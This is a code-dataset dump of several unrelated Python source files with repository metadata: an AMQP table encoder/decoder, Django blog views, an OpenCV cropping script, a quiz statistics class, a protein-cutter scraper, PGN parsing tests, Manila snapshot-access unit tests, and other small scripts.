skip null # byte check. if length > 255: raise exceptions.ShortStringTooLong(encoded_value) pieces.append(struct.pack('B', length)) pieces.append(encoded_value) return 1 + length if PY2: def decode_short_string(encoded, offset): """Decode a short string value from ``encoded`` data at ``offset``. """ length = struct.unpack_from('B', encoded, offset)[0] offset += 1 # Purely for compatibility with original python2 code. No idea what # and why this does. value = encoded[offset:offset + length] try: value = bytes(value) except UnicodeEncodeError: pass offset += length return value, offset else: def decode_short_string(encoded, offset): """Decode a short string value from ``encoded`` data at ``offset``. """ length = struct.unpack_from('B', encoded, offset)[0] offset += 1 value = encoded[offset:offset + length].decode('utf8') offset += length return value, offset def encode_table(pieces, table): """Encode a dict as an AMQP table appending the encded table to the pieces list passed in. :param list pieces: Already encoded frame pieces :param dict table: The dict to encode :rtype: int """ table = table or {} length_index = len(pieces) pieces.append(None) # placeholder tablesize = 0 for (key, value) in table.items(): tablesize += encode_short_string(pieces, key) tablesize += encode_value(pieces, value) pieces[length_index] = struct.pack('>I', tablesize) return tablesize + 4 def encode_value(pieces, value): """Encode the value passed in and append it to the pieces list returning the the size of the encoded value. :param list pieces: Already encoded values :param any value: The value to encode :rtype: int """ if PY2: if isinstance(value, basestring): if isinstance(value, unicode_type): value = value.encode('utf-8') pieces.append(struct.pack('>cI', b'S', len(value))) pieces.append(value) return 5 + len(value) else: # support only str on Python 3 if isinstance(value, str): value = value.encode('utf-8') pieces.append(struct.pack('>cI', b'S', len(value))) pieces.append(value) return 5 + len(value) if isinstance(value, bool): pieces.append(struct.pack('>cB', b't', int(value))) return 2 if isinstance(value, long): pieces.append(struct.pack('>cq', b'l', value)) return 9 elif isinstance(value, int): pieces.append(struct.pack('>ci', b'I', value)) return 5 elif isinstance(value, decimal.Decimal): value = value.normalize() if value.as_tuple().exponent < 0: decimals = -value.as_tuple().exponent raw = int(value * (decimal.Decimal(10) ** decimals)) pieces.append(struct.pack('>cBi', b'D', decimals, raw)) else: # per spec, the "decimals" octet is unsigned (!) pieces.append(struct.pack('>cBi', b'D', 0, int(value))) return 6 elif isinstance(value, datetime): pieces.append(struct.pack('>cQ', b'T', calendar.timegm(value.utctimetuple()))) return 9 elif isinstance(value, dict): pieces.append(struct.pack('>c', b'F')) return 1 + encode_table(pieces, value) elif isinstance(value, list): p = [] for v in value: encode_value(p, v) piece = b''.join(p) pieces.append(struct.pack('>cI', b'A', len(piece))) pieces.append(piece) return 5 + len(piece) elif value is None: pieces.append(struct.pack('>c', b'V')) return 1 else: raise exceptions.UnsupportedAMQPFieldException(pieces, value) def decode_table(encoded, offset): """Decode the AMQP table passed in from the encoded value returning the decoded result and the number of bytes read plus the offset. :param str encoded: The binary encoded data to decode :param int offset: The starting byte offset :rtype: tuple """ result = {} tablesize = struct.unpack_from('>I', encoded, offset)[0] offset += 4 limit = offset + tablesize while offset < limit: key, offset = decode_short_string(encoded, offset) value, offset = decode_value(encoded, offset) result[key] = value return result, offset def decode_value(encoded, offset): """Decode the value passed in returning the decoded value and the number of bytes read in addition to the starting offset. :param str encoded: The binary encoded data to decode :param int offset: The starting byte offset :rtype: tuple :raises: pika.exceptions.InvalidFieldTypeException """ # slice to get bytes in Python 3 and str in Python 2 kind = encoded[offset:offset + 1] offset += 1 # Bool if kind == b't': value = struct.unpack_from('>B', encoded, offset)[0] value = bool(value) offset += 1 # Short-Short Int elif kind == b'b': value = struct.unpack_from('>B', encoded, offset)[0] offset += 1 # Short-Short Unsigned Int elif kind == b'B': value = struct.unpack_from('>b', encoded, offset)[0] offset += 1 # Short Int elif kind == b'U': value = struct.unpack_from('>h', encoded, offset)[0] offset += 2 # Short Unsigned Int elif kind == b'u': value = struct.unpack_from('>H', encoded, offset)[0] offset += 2 # Long Int elif kind == b'I': value = struct.unpack_from('>i', encoded, offset)[0] offset += 4 # Long Unsigned Int elif kind == b'i': value = struct.unpack_from('>I', encoded, offset)[0] offset += 4 # Long-Long Int elif kind == b'L': value = long(struct.unpack_from('>q', encoded, offset)[0]) offset += 8 # Long-Long Unsigned Int elif kind == b'l': value = long(struct.unpack_from('>Q', encoded, offset)[0]) offset += 8 # Float elif kind == b'f': value = long(struct.unpack_from('>f', encoded, offset)[0]) offset += 4 # Double elif kind == b'd': value = long(struct.unpack_from('>d', encoded, offset)[0]) offset += 8 # Decimal elif kind == b'D': decimals = struct.unpack_from('B', encoded, offset)[0] offset += 1 raw = struct.unpack_from('>i', encoded, offset)[0] offset += 4 value = decimal.Decimal(raw) * (decimal.Decimal(10) ** -decimals) # Short String elif kind == b's': value, offset = decode_short_string(encoded, offset) # Long String elif kind == b'S': length = struct.unpack_from('>I', encoded, offset)[0] offset += 4 value = encoded[offset:offset + length].decode('utf8') offset += length # Field Array elif kind == b'A': length = struct.unpack_from('>I', encoded, offset)[0] offset += 4 offset_end = offset + length value = [] while offset < offset_end: v, offset = decode_value(encoded, offset) value.append(v) # Timestamp elif kind == b'T': value = datetime.utcfromtimestamp(struct.unpack_from('>Q', encoded, offset)[0]) offset += 8 # Field Table elif kind == b'F': (value, offset) = decode_table(encoded, offset) # Null / Void elif kind == b'V': value = None else: raise exceptions.InvalidFieldTypeException(kind) return value, offset
30.534247
80
0.596456
0
0
0
0
0
0
0
0
2,707
0.303611
fe372dac70d64a37ad3e688bb47fa5b1bd4ad42e
528
py
Python
tests/fixtures/data_sets/service/dummy/dummy_configurable.py
Agi-dev/pylaas_core
c44866b5e57eb6f05f5b2b8d731f22d62a8c01c2
[ "MIT" ]
null
null
null
tests/fixtures/data_sets/service/dummy/dummy_configurable.py
Agi-dev/pylaas_core
c44866b5e57eb6f05f5b2b8d731f22d62a8c01c2
[ "MIT" ]
2
2021-03-25T21:30:41.000Z
2021-06-01T21:25:37.000Z
tests/fixtures/data_sets/service/dummy/dummy_configurable.py
Agi-dev/pylaas_core
c44866b5e57eb6f05f5b2b8d731f22d62a8c01c2
[ "MIT" ]
null
null
null
from pylaas_core.abstract.abstract_service import AbstractService import time from pylaas_core.interface.technical.container_configurable_aware_interface import ContainerConfigurableAwareInterface class DummyConfigurable(AbstractService, ContainerConfigurableAwareInterface): def __init__(self) -> None: super().__init__() self._microtime = int(round(time.time() * 1000)) self._configs = None def set_configs(self, configurations): self._configs = configurations return self
31.058824
118
0.765152
327
0.619318
0
0
0
0
0
0
0
0
fe3845f60103709c0d0030d388891565874650ad
1,076
py
Python
blogtech/src/blog/views.py
IVAN-URBACZKA/django-blog
7ef6050c0de2938791843c3ec93e6e6a1e683baa
[ "MIT" ]
null
null
null
blogtech/src/blog/views.py
IVAN-URBACZKA/django-blog
7ef6050c0de2938791843c3ec93e6e6a1e683baa
[ "MIT" ]
null
null
null
blogtech/src/blog/views.py
IVAN-URBACZKA/django-blog
7ef6050c0de2938791843c3ec93e6e6a1e683baa
[ "MIT" ]
null
null
null
from django.urls import reverse_lazy, reverse from django.utils.decorators import method_decorator from django.views.generic import ListView, DetailView, CreateView, DeleteView, UpdateView from .models import BlogPost from django.contrib.auth.decorators import login_required class BlogPostHomeView(ListView): model = BlogPost context_object_name = "posts" class BlogPostDetailsView(DetailView): model = BlogPost context_object_name = "post" @method_decorator(login_required, name='dispatch') class BlogPostCreateView(CreateView): model = BlogPost fields = ['title', 'image','author', 'category', 'content'] def get_success_url(self): return reverse('posts:home') @method_decorator(login_required, name='dispatch') class BlogPostUpdateView(UpdateView): model = BlogPost fields = ['title', 'author', 'category', 'content'] template_name = 'blog/blogpost_update.html' @method_decorator(login_required, name='dispatch') class BlogPostDeleteView(DeleteView): model = BlogPost success_url = reverse_lazy('posts:home')
31.647059
89
0.760223
636
0.591078
0
0
609
0.565985
0
0
169
0.157063
fe393898f4084fe1c0d82dbb19e8e9bf170a60ea
4,514
py
Python
apc_deep_vision/python/generate_data.py
Juxi/apb-baseline
fd47a5fd78cdfd75c68601a40ca4726d7d20c9ce
[ "BSD-3-Clause" ]
9
2017-02-06T10:24:56.000Z
2022-02-27T20:59:52.000Z
apc_deep_vision/python/generate_data.py
Juxi/apb-baseline
fd47a5fd78cdfd75c68601a40ca4726d7d20c9ce
[ "BSD-3-Clause" ]
null
null
null
apc_deep_vision/python/generate_data.py
Juxi/apb-baseline
fd47a5fd78cdfd75c68601a40ca4726d7d20c9ce
[ "BSD-3-Clause" ]
2
2017-10-15T08:33:37.000Z
2019-03-05T07:29:38.000Z
#! /usr/bin/env python # ******************************************************************** # Software License Agreement (BSD License) # # Copyright (c) 2015, University of Colorado, Boulder # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of the University of Colorado Boulder # nor the names of its contributors may be # used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # ********************************************************************/ import cv2 import os import numpy as np if __name__ == '__main__': import argparse parser = argparse.ArgumentParser() parser.add_argument("proposal_path", type=str, help="relative path from python script to proposals, no slash") parser.add_argument("--view", default=None, help="true/1 shows each masked image") args = parser.parse_args() # args.proposal_path = "../test_proposals" # args.proposal_path = args.proposal_path included_extenstions = ['txt'] image_names = [fn[0:len(fn)-4] for fn in os.listdir(args.proposal_path) if any(fn.endswith(ext) for ext in included_extenstions)] for image_name in image_names: load_path = args.proposal_path + '/' + image_name image = cv2.imread(load_path + ".jpeg") data = np.loadtxt(load_path + ".txt", str) # If there is only one line, force data to be a list of lists anyway # Note, only works for our data as first list item is a string if isinstance(data[0], basestring): data = [data] # If any line does not conform to classification tl_x tl_y br_x br_y # then forget about it skip = False for line in data: if len(line) < 5: skip = True if skip: continue for i, proposal in zip(range(0,len(data)),data): mask = cv2.imread(load_path + '_mask{0:04d}.jpeg'.format(i)) mask = np.invert(mask) maskGray = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY) ret, maskGray = cv2.threshold(maskGray,128,255,cv2.THRESH_BINARY) print load_path + '_mask{0:04d}.jpeg'.format(i) cropped = image[float(proposal[2]):float(proposal[4]), float(proposal[1]):float(proposal[3])] masked = cv2.bitwise_and(cropped, cropped, mask = maskGray) if args.view: cv2.imshow("original", masked) cv2.waitKey(0) mask_directory = args.proposal_path + '/masked/' + proposal[0]; crop_directory = args.proposal_path + '/cropped/' + proposal[0]; if not os.path.exists(mask_directory): os.makedirs(mask_directory) if not os.path.exists(crop_directory): os.makedirs(crop_directory) cv2.imwrite(mask_directory + '/{}_{}.jpeg'.format(image_name,i), masked) cv2.imwrite(crop_directory + '/{}_{}.jpeg'.format(image_name,i), cropped) # item = data[] # cropped = image[70:170, 440:540] # startY:endY, startX:endX # startX:startY, endX:endY #
37.932773
105
0.634914
0
0
0
0
0
0
0
0
2,437
0.539876
fe39cd977754d7baa5900e133ad7f76b583b9786
3,509
py
Python
stats.py
shirshanka/fact-ory
9e6bae63ca7f8f534b811058efb8942004d6a37b
[ "Apache-2.0" ]
null
null
null
stats.py
shirshanka/fact-ory
9e6bae63ca7f8f534b811058efb8942004d6a37b
[ "Apache-2.0" ]
null
null
null
stats.py
shirshanka/fact-ory
9e6bae63ca7f8f534b811058efb8942004d6a37b
[ "Apache-2.0" ]
null
null
null
import numpy as np; import sys import matplotlib.pyplot as plt; from matplotlib import cm; from termcolor import colored; class Stats(): def __init__(self, param1_range, param2_range): self._total_times = 0; self._total_time = 0.0; self._wrong_answers = []; self._time_dict = {}; self._param1_range = param1_range self._param2_range = param2_range self._param1_length = param1_range[1] - param1_range[0] + 1 self._param2_length = param2_range[1] - param2_range[0] + 1 self._red_color = 1.0 self._green_color = 0.3 self._cream_color = 0.6 self._default_color = np.nan self._wrong_color = 1000.0 self._time_penalty = 2.0 # time penalty for wrong answer is 5 seconds self._result_matrix = np.full((self._param1_length, self._param2_length), self._default_color) def add_statistic(self, operator, param1,param2,ans,time_diff): self.add_time_statistic(param1, param2, time_diff) x_axis = param1 - self._param1_range[0] y_axis = param2 - self._param2_range[0] curr_value = self._result_matrix[x_axis][y_axis] incr_value = time_diff if (operator.evaluate(param1, param2) != ans): # wrong answer self.add_wrong_answer(param1,param2,ans) incr_value = incr_value + self._time_penalty else: # right answer: do nothing pass if np.isnan(curr_value): self._result_matrix[x_axis][y_axis] = incr_value else: self._result_matrix[x_axis][y_axis] = curr_value + incr_value def add_time_statistic(self, param1, param2, time_diff): self._total_times = self._total_times +1; self._total_time = self._total_time + time_diff; if not self._time_dict.has_key(param1): self._time_dict[param1] = [] if not self._time_dict.has_key(param2): self._time_dict[param2] = [] self._time_dict[param1].append(time_diff) self._time_dict[param2].append(time_diff) def add_wrong_answer(self, param1, param2, answer_given): self._wrong_answers.append((param1,param2, answer_given)) def get_avg_time(self): return (self._total_time / self._total_times); def print_stats(self, operator): sys.stdout.write("You took an average of %0.2f seconds to answer each question!\n" % self.get_avg_time()); if self._wrong_answers != []: print("Here were the answers you got wrong...") for (f1,f2,ans) in self._wrong_answers: print ("%d %s %d = " % (f1,operator.symbol,f2)), colored("%d" % ans, "red"), "Correct answer is ", colored("%d" % operator.evaluate(f1,f2), "green") row_labels = range(self._param1_range[0],self._param1_range[1]+1) col_labels = range(self._param2_range[0],self._param2_range[1]+1) #plt.matshow(self._result_matrix, cmap=cm.Spectral_r, vmin=0, vmax=1) fig = plt.figure() ax = fig.add_subplot(111) cax = ax.matshow(self._result_matrix, interpolation='nearest', vmin=0) fig.colorbar(cax) plt.gca().set_aspect('auto') row_ticks = range(len(row_labels)) col_ticks = range(len(col_labels)) if (len(row_labels) > 10): skip_every = int(len(row_labels) / 10); row_labels = row_labels[0::skip_every] row_ticks = row_ticks[0::skip_every] if (len(col_labels) > 10): skip_every = int(len(col_labels)/10) col_labels = col_labels[0::skip_every] col_ticks = col_ticks[0::skip_every] plt.xticks(col_ticks, col_labels) plt.yticks(row_ticks, row_labels) plt.show() if __name__=="__main__": print "hello world"
34.742574
154
0.68937
3,336
0.950698
0
0
0
0
0
0
349
0.099459
fe3be5e4c8643dd88fcaa6473267f6ae2cf76961
1,706
py
Python
examples/peptidecutter/advanced.py
zjuchenyuan/EasyLogin
acc67187d902f20ec64d2d6b9eeb953e2a0ac77d
[ "MIT" ]
33
2016-12-01T01:33:31.000Z
2021-05-12T03:32:27.000Z
examples/peptidecutter/advanced.py
zjuchenyuan/EasyLogin
acc67187d902f20ec64d2d6b9eeb953e2a0ac77d
[ "MIT" ]
2
2018-04-26T06:58:29.000Z
2020-01-11T15:18:14.000Z
examples/peptidecutter/advanced.py
zjuchenyuan/EasyLogin
acc67187d902f20ec64d2d6b9eeb953e2a0ac77d
[ "MIT" ]
4
2017-02-24T11:08:45.000Z
2021-01-13T16:00:33.000Z
from EasyLogin import EasyLogin from pprint import pprint def peptidecutter(oneprotein): a = EasyLogin(proxy="socks5://127.0.0.1:1080") #speed up by using proxy a.post("http://web.expasy.org/cgi-bin/peptide_cutter/peptidecutter.pl", "protein={}&enzyme_number=all_enzymes&special_enzyme=Chym&min_prob=&block_size=60&alphtable=alphtable&cleave_number=all&cleave_exactly=&cleave_range_min=&cleave_range_max=".format(oneprotein) ) table=a.b.find("table",{"class":"proteomics2"}) tds=table.find_all("td") result = [] oneline = [] i = 0 for td in tds: i+=1 if i==1: content = td.text elif i==2: content = int(td.text) else: content = [int(i) for i in td.text.split()] oneline.append(content) if i==3: result.append(oneline) oneline=[] i=0 return result def fasta_reader(filename): filecontents = open(filename).read().split("\n") name = "" thedata = "" result=[] for line in filecontents: if not len(line): continue if line[0]=='>': if len(thedata): result.append([name,thedata]) thedata = "" name = line else: thedata += line result.append([name,thedata])#don't forget the last one return result def peptidecutter_more(filename): return [ [name,peptidecutter(oneprotein)] for name,oneprotein in fasta_reader(filename) ] if __name__ == "__main__": #pprint(peptidecutter("SERVELAT")) import sys pprint(peptidecutter_more(sys.argv[1]))
30.464286
200
0.579132
0
0
0
0
0
0
0
0
401
0.235053
fe3c13d3bb5c59b28cc1e5b5a35923b1537df9f4
1,333
py
Python
pgn2fixture/tests/test_utils.py
pointerish/pgn2fixture
02039680acc37cbca22fb332738e34cd113831a4
[ "MIT" ]
3
2021-03-18T19:08:59.000Z
2021-10-10T03:52:49.000Z
pgn2fixture/tests/test_utils.py
pointerish/pgn2fixture
02039680acc37cbca22fb332738e34cd113831a4
[ "MIT" ]
null
null
null
pgn2fixture/tests/test_utils.py
pointerish/pgn2fixture
02039680acc37cbca22fb332738e34cd113831a4
[ "MIT" ]
null
null
null
import unittest from .. import utils class TestUtils(unittest.TestCase): def setUp(self) -> None: self.pgn_string = ''' [Event "US Championship 1963/64"] [Site "New York, NY USA"] [Date "1964.01.01"] [EventDate "1963.??.??"] [Round "11"][Result "0-1"] [White "Anthony Saidy"] [Black "Robert James Fischer"] [ECO "A33"] [WhiteElo "?"] [BlackElo "?"][PlyCount "112"] 1. c4 0-1''' def test_clean(self): result = ['Event "US Championship 1963/64"', 'Site "New York, NY USA"', 'Date "1964.01.01"', 'EventDate "1963.??.??"', 'Round "11"', 'Result "0-1"', 'White "Anthony Saidy"', 'Black "Robert James Fischer"', 'ECO "A33"', 'WhiteElo "?"', 'BlackElo "?"', 'PlyCount "112"', '1. c4 0-1'] self.assertEqual(utils.clean(self.pgn_string), result) def test_extract_tag_roster(self): result = {'event': 'US Championship 1963/64', 'site': 'New York, NY USA', 'date': '1964.01.01', 'eventdate': '1963.??.??', 'round': '11', 'result': '0-1', 'white': 'Anthony Saidy', 'black': 'Robert James Fischer', 'eco': 'A33', 'whiteelo': '?', 'blackelo': '?', 'plycount': '112', 'moves': '1. c4 0-1'} self.assertEqual(utils.extract_tag_roster(self.pgn_string), result)
43
165
0.549887
1,293
0.969992
0
0
0
0
0
0
845
0.633908
fe3c354a94b9bc97c332f504c7fb8dc959b31224
7,019
py
Python
manila/tests/share/test_snapshot_access.py
gouthampacha/manila
4b7ba9b99d272663f519b495668715fbf979ffbc
[ "Apache-2.0" ]
3
2016-06-06T13:05:00.000Z
2021-05-05T04:29:24.000Z
manila/tests/share/test_snapshot_access.py
gouthampacha/manila
4b7ba9b99d272663f519b495668715fbf979ffbc
[ "Apache-2.0" ]
5
2019-08-14T06:46:03.000Z
2021-12-13T20:01:25.000Z
manila/tests/share/test_snapshot_access.py
gouthampacha/manila
4b7ba9b99d272663f519b495668715fbf979ffbc
[ "Apache-2.0" ]
2
2020-03-15T01:24:15.000Z
2020-07-22T20:34:26.000Z
# Copyright (c) 2016 Hitachi Data Systems, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import copy import ddt import mock from manila.common import constants from manila import context from manila import db from manila import exception from manila.share import snapshot_access from manila import test from manila.tests import db_utils from manila import utils @ddt.ddt class SnapshotAccessTestCase(test.TestCase): def setUp(self): super(SnapshotAccessTestCase, self).setUp() self.driver = self.mock_class("manila.share.driver.ShareDriver", mock.Mock()) self.snapshot_access = snapshot_access.ShareSnapshotInstanceAccess( db, self.driver) self.context = context.get_admin_context() share = db_utils.create_share() self.snapshot = db_utils.create_snapshot(share_id=share['id']) self.snapshot_instance = db_utils.create_snapshot_instance( snapshot_id=self.snapshot['id'], share_instance_id=self.snapshot['share']['instance']['id']) @ddt.data(constants.ACCESS_STATE_QUEUED_TO_APPLY, constants.ACCESS_STATE_QUEUED_TO_DENY) def test_update_access_rules(self, state): rules = [] for i in range(2): rules.append({ 'id': 'id-%s' % i, 'state': state, 'access_id': 'rule_id%s' % i }) all_rules = copy.deepcopy(rules) all_rules.append({ 'id': 'id-3', 'state': constants.ACCESS_STATE_ERROR, 'access_id': 'rule_id3' }) snapshot_instance_get = self.mock_object( db, 'share_snapshot_instance_get', mock.Mock(return_value=self.snapshot_instance)) snap_get_all_for_snap_instance = self.mock_object( db, 'share_snapshot_access_get_all_for_snapshot_instance', mock.Mock(return_value=all_rules)) self.mock_object(db, 'share_snapshot_instance_access_update') self.mock_object(self.driver, 'snapshot_update_access') self.mock_object(self.snapshot_access, '_check_needs_refresh', mock.Mock(return_value=False)) self.mock_object(db, 'share_snapshot_instance_access_delete') self.snapshot_access.update_access_rules(self.context, self.snapshot_instance['id']) snapshot_instance_get.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance['id'], with_share_data=True) snap_get_all_for_snap_instance.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance['id']) if state == constants.ACCESS_STATE_QUEUED_TO_APPLY: self.driver.snapshot_update_access.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance, rules, add_rules=rules, delete_rules=[], share_server=None) else: self.driver.snapshot_update_access.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance, [], add_rules=[], delete_rules=rules, share_server=None) def test_update_access_rules_delete_all_rules(self): rules = [] for i in range(2): rules.append({ 'id': 'id-%s' % i, 'state': constants.ACCESS_STATE_QUEUED_TO_DENY, 'access_id': 'rule_id%s' % i }) snapshot_instance_get = self.mock_object( db, 'share_snapshot_instance_get', mock.Mock(return_value=self.snapshot_instance)) snap_get_all_for_snap_instance = self.mock_object( db, 'share_snapshot_access_get_all_for_snapshot_instance', mock.Mock(side_effect=[rules, []])) self.mock_object(db, 'share_snapshot_instance_access_update') self.mock_object(self.driver, 'snapshot_update_access') self.mock_object(db, 'share_snapshot_instance_access_delete') self.snapshot_access.update_access_rules(self.context, self.snapshot_instance['id'], delete_all_rules=True) snapshot_instance_get.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance['id'], with_share_data=True) snap_get_all_for_snap_instance.assert_called_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance['id']) self.driver.snapshot_update_access.assert_called_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance, [], add_rules=[], delete_rules=rules, share_server=None) def test_update_access_rules_exception(self): rules = [] for i in range(2): rules.append({ 'id': 'id-%s' % i, 'state': constants.ACCESS_STATE_APPLYING, 'access_id': 'rule_id%s' % i }) snapshot_instance_get = self.mock_object( db, 'share_snapshot_instance_get', mock.Mock(return_value=self.snapshot_instance)) snap_get_all_for_snap_instance = self.mock_object( db, 'share_snapshot_access_get_all_for_snapshot_instance', mock.Mock(return_value=rules)) self.mock_object(db, 'share_snapshot_instance_access_update') self.mock_object(self.driver, 'snapshot_update_access', mock.Mock(side_effect=exception.NotFound)) self.assertRaises(exception.NotFound, self.snapshot_access.update_access_rules, self.context, self.snapshot_instance['id']) snapshot_instance_get.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance['id'], with_share_data=True) snap_get_all_for_snap_instance.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance['id']) self.driver.snapshot_update_access.assert_called_once_with( utils.IsAMatcher(context.RequestContext), self.snapshot_instance, rules, add_rules=rules, delete_rules=[], share_server=None)
41.532544
78
0.648383
6,087
0.867218
0
0
6,096
0.8685
0
0
1,422
0.202593
fe3d447e3c8eb707e5a1d8550493f94e70efafc2
269
py
Python
packages/pyright-internal/src/tests/samples/unnecessaryCast1.py
sasano8/pyright
e804f324ee5dbd25fd37a258791b3fd944addecd
[ "MIT" ]
4,391
2019-05-07T01:18:57.000Z
2022-03-31T20:45:44.000Z
packages/pyright-internal/src/tests/samples/unnecessaryCast1.py
sasano8/pyright
e804f324ee5dbd25fd37a258791b3fd944addecd
[ "MIT" ]
2,740
2019-05-07T03:29:30.000Z
2022-03-31T12:57:46.000Z
packages/pyright-internal/src/tests/samples/unnecessaryCast1.py
sasano8/pyright
e804f324ee5dbd25fd37a258791b3fd944addecd
[ "MIT" ]
455
2019-05-07T12:55:14.000Z
2022-03-31T17:09:15.000Z
# This sample tests the type checker's reportUnnecessaryCast feature. from typing import cast, Union def foo(a: int): # This should generate an error if # reportUnnecessaryCast is enabled. b = cast(int, a) c: Union[int, str] = "hello" d = cast(int, c)
19.214286
69
0.687732
0
0
0
0
0
0
0
0
145
0.539033
fe3dd2d72750bce0851326699b900d4e0689f605
690
py
Python
Python/1238.py
ArikBartzadok/beecrowd-challenges
ddb0453d1caa75c87c4b3ed6a40309ab99da77f2
[ "MIT" ]
null
null
null
Python/1238.py
ArikBartzadok/beecrowd-challenges
ddb0453d1caa75c87c4b3ed6a40309ab99da77f2
[ "MIT" ]
null
null
null
Python/1238.py
ArikBartzadok/beecrowd-challenges
ddb0453d1caa75c87c4b3ed6a40309ab99da77f2
[ "MIT" ]
null
null
null
def execucoes(): return int(input()) def entradas(): return input().split(' ') def imprimir(v): print(v) def tamanho_a(a): return len(a) def tamanho_b(b): return len(b) def diferenca_tamanhos(a, b): return (len(a) <= len(b)) def analisar(e, i, s): a, b = e if(diferenca_tamanhos(a, b)): for i in range(tamanho_a(a)): s += a[i] s += b[i] s += b[tamanho_a(a):] else: for i in range(tamanho_b(b)): s += a[i] s += b[i] s += a[tamanho_b(b):] return s def combinador(): n = execucoes() for i in range(n): imprimir(analisar(entradas(), i, '')) combinador()
18.157895
60
0.510145
0
0
0
0
0
0
0
0
5
0.007246
fe3e731bfc56815773233eb7a914918e37d052e2
974
py
Python
metadata_service/api/popular_tables.py
worldwise001/amundsenmetadatalibrary
9914c8b51d38b8bd76d3249eb4f7fcce3e198d09
[ "Apache-2.0" ]
null
null
null
metadata_service/api/popular_tables.py
worldwise001/amundsenmetadatalibrary
9914c8b51d38b8bd76d3249eb4f7fcce3e198d09
[ "Apache-2.0" ]
1
2019-09-21T23:59:46.000Z
2019-09-21T23:59:46.000Z
metadata_service/api/popular_tables.py
worldwise001/amundsenmetadatalibrary
9914c8b51d38b8bd76d3249eb4f7fcce3e198d09
[ "Apache-2.0" ]
1
2019-09-21T23:56:40.000Z
2019-09-21T23:56:40.000Z
from http import HTTPStatus from typing import Iterable, Union, Mapping from flask import request from flask_restful import Resource, fields, marshal from metadata_service.proxy import get_proxy_client popular_table_fields = { 'database': fields.String, 'cluster': fields.String, 'schema': fields.String, 'table_name': fields.String(attribute='name'), 'table_description': fields.String(attribute='description'), # Optional } popular_tables_fields = { 'popular_tables': fields.List(fields.Nested(popular_table_fields)) } class PopularTablesAPI(Resource): """ PopularTables API """ def __init__(self) -> None: self.client = get_proxy_client() def get(self) -> Iterable[Union[Mapping, int, None]]: limit = request.args.get('limit', 10) popular_tables = self.client.get_popular_tables(num_entries=limit) return marshal({'popular_tables': popular_tables}, popular_tables_fields), HTTPStatus.OK
29.515152
96
0.722793
421
0.432238
0
0
0
0
0
0
159
0.163244
fe3e90a0352653677e5f89aa3d6275c22d3a1048
470
py
Python
tests/test1.py
SaijC/manhwaDownloader
f6e97cfe25355598e42633a3796d84b666d5302f
[ "MIT" ]
null
null
null
tests/test1.py
SaijC/manhwaDownloader
f6e97cfe25355598e42633a3796d84b666d5302f
[ "MIT" ]
null
null
null
tests/test1.py
SaijC/manhwaDownloader
f6e97cfe25355598e42633a3796d84b666d5302f
[ "MIT" ]
null
null
null
import requests import logging import cfscrape import os from manhwaDownloader.constants import CONSTANTS as CONST logging.basicConfig(level=logging.DEBUG) folderPath = os.path.join(CONST.OUTPUTPATH, 'serious-taste-of-forbbiden-fruit') logging.info(len([file for file in os.walk(folderPath)])) walkList = [file for file in os.walk(folderPath)] chapterDicts = dict() for folder, _, files in walkList[1:]: chapterDicts.update({folder: files}) print(chapterDicts)
24.736842
79
0.778723
0
0
0
0
0
0
0
0
34
0.07234
fe3ee793457d0725edb13bd4a978ffe58340aff1
11,708
py
Python
others/Keras_custom_error.py
rahasayantan/Work-For-Reference
e052da538df84034ec5a0fe3b19c4287de307286
[ "MIT" ]
null
null
null
others/Keras_custom_error.py
rahasayantan/Work-For-Reference
e052da538df84034ec5a0fe3b19c4287de307286
[ "MIT" ]
null
null
null
others/Keras_custom_error.py
rahasayantan/Work-For-Reference
e052da538df84034ec5a0fe3b19c4287de307286
[ "MIT" ]
null
null
null
